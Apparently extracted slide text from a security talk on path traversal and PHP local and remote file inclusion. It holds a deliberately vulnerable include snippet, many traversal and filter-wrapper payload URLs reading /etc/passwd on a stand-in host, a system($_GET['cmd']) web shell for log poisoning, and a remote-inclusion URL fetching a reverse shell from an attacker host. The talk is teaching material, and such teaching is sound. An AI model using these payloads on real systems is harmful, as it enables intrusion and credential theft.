Path traversal (directory traversal)
Igor Tarpan
Armed Forces of the Republic of Moldova
Networking
Server management
Security
Starlab
Information security engineer
Endava
Cyber security analyst
cmd.exe C:\Program Files\Amego Browser\Amego.exe
cmd.exe Amego Browser\Amego.exe
Curent location
C:\Program Files\
Curent location
C:\Program Files\VLC Player\
cmd.exe ..\Amego Browser\Amego.exe
cat /var/www/html/index.html
cat html/index.html
Curent location
\var\www\
Curent location
\var\logs\nginx\
cat ../../www/html/index.html
(Local file inclusion)
Local File Inclusion is the process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application.
<?php
<h1>Hello Secure Talks</h1>
include $_GET['page']
?>
http://pwnme.com/index.php?page=articles.php
http://pwnme.com/?page=articles.php
=
index.php
<?php
<h1>Hello Secure Talks</h1>
include $_GET['articles.php']
?>
index.php
index.php
<?php
<h1>Hello Secure Talks</h1>
include $_GET['articles.php']
?>
index.php
<?php
<h1>Hello Secure Talks</h1>
include $_GET['./articles.php']
?>
index.php
<?php
<h1>Hello Secure Talks</h1>
include $_GET['../../../etc/passwd']
?>
=
http://pwnme.com/index.php?page=../../../etc/passwd
index.php
<?php
<h1>Hello Secure Talks</h1>
include $_GET['articles'].".php"
?>
http://pwnme.com/index.php?page=articles
http://pwnme.com/index.php?page=articles.php
./articles.php.php
../../../etc/passwd.php
../../etc/mysql/my.cnf.php
Null byte injection
PHP <= v.5.3.
http://pwnme.com/index.php?page=../../etc/passwd%00
index.php
<?php
<h1>Hello Secure Talks</h1>
include $_GET['../../etc/passwd%00'].".php"
?>
Path truncation
PHP <= v.5.3.
http://pwnme.com/index.php?page=../../etc/passwd////...//////
index.php
<?php
<h1>Hello Secure Talks</h1>
include $_GET['../../etc/passwd//////... /////'].".php"
?>
http://pwnme.com/index.php?page=../../././././././etc/passwd
http://pwnme.com/index.php?page=%2e%2e%2fetc%2fpasswd
index.php
http://pwnme.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://pwnme.com/index.php?page=....//....//etc/passwd
http://pwnme.com/index.php?page=..///////..////..//////etc/passwd
http://pwnme.com/index.php?page=php://filter/read=string.rot13/resource=/etc/passwd
http://pwnme.com/index.php?page=expect://id
http://pwnme.com/index.php?page=expect://ls
http://pwnme.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=/etc/passwd
http://pwnme.com/index.php?page=php://filter/convert.base64-encode/resource=/etc/passwd
...
poisoning
<?php echo system($_GET["cmd"]); ?>
<?php echo system($_GET["cmd"]); ?>
http://pwnme.com/index.php?page=../../../poisoned_file.txt?cmd=whoami
root
2
1
3
http://pwnme.com/
file upload
http://pwnme.com/index.php?page=../upload/shell.php
2
1
shell.jpg.php
shell.jpg.php
www/upload/
http://pwnme.com/
file upload
(remote file inclusion)
http://pwnme.com/index.php?page=http://attcker.md/reverse-shell.php
2
1
reverse-shell.php
http://attcker.md/
http://attacker.md/
http://pwnme.com/
3
php.ini
Local File Inclusion | Path traversal |
---|---|
File execution (php) | File reading |
File reading |
<?php
<h1>Hello Secure Talks</h1>
echo "Hack the planet !";
?>
Hello Secure Talks
Hack the planet !
<?php
<h1>Hello Secure Talks</h1>
echo "Hack the planet !";
?>